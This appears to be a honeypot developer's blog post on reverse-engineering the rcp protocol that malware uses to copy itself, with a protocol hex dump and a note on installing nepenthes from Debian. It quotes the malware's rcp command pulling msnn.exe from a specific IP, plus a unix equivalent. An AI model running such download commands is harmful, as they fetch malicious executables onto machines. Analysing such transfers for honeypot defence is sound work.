Some time ago, we got reports malware was using the rcp.exe client to transfer itself to another box.
Wise choice, the protocol is much easier than ftp, as you don't need two connections, and is much more error redundant than tftp as it uses tcp instead of udp, and actually it was pretty hard to find out how it works, as there is no RFC, or any other doc.
Microsoft was pretty lazy creating their rcp.exe client, they just compiled the BSD licensed code on Windows and were done.
I had a look on the BSD code and ended up installing the whole r(sh|rshd|login|logind|cp) family on my box, and using ethereal to find out how it works.
When i started understanding the pretty insane security model behind rsh, I suddenly knew why nobody documented it, there is no security layer, and nobody wants his name under the protocol description.
rcp -b 82.24.130.196.thebuz:msnn.exe msnn.exe
if you want to check it out using unix rcp
rcp thebuz@82.24.130.196:msnn.exe msnn.exe
| byte | Client Send | Server Send | |||
|---|---|---|---|---|---|
| hexdump | text | hexdump | text | C | |
| 00000 | 00 | . | 1 | ||
| 00001 | 74 68 65 62 75 7a 00 74 68 65 62 75 7a 00 72 63 | thebuz.t hebuz.rc | |||
| 00011 | 70 20 2d 66 20 6d 73 6e 6e 2e 65 78 65 00 | p -f msn n.exe. | |||
| 00000 | 00 | . | 2 | ||
| 0001F | 00 | . | 3 | ||
| 00001 | 43 30 37 35 35 20 31 30 36 30 30 31 20 6d 73 6e | C0755 10 6001 msn | 4 | ||
| 00011 | 6e 2e 65 78 65 0a | n.exe. | |||
| 00020 | 00 | . | 5 | ||
| 00017 | 4d 5a 00 00 00 00 00 00 00 00 00 00 50 45 00 00 | MZ…… ….PE.. | 6 | ||
| 00027 | 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 | L……. …….. | |||
| ….. | .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. | …….. …….. | |||
| 19E17 | 00 00 00 00 00 00 00 00 00 cf cb 09 00 0c 30 08 | …….. ……0. | |||
| 19E27 | 00 | . | |||
| 19E28 | 00 | . | |||
(dont ask how long it took me to draw it)
As you might guess, I just finished it, writing it was a real pain, apart from the protocol the main problem was typing rpc instead of rcp, if we got no time, you will get a patch for it, else …
Some days ago i posted some news, mentioning the korgo flood would have stopped for me, actually it started again.
If you experience the same, or have an explanation for this mysterium, please drop me a line.
nepenthes hit debian unstable package management some time ago, that means installing nepenthes on debian is just as simple as typing
apt-get update apt-cache show nepenthes apt-get install nepenthes
http://packages.debian.org/unstable/net/nepenthes
Thanks to the maintainer Luciano Bello.
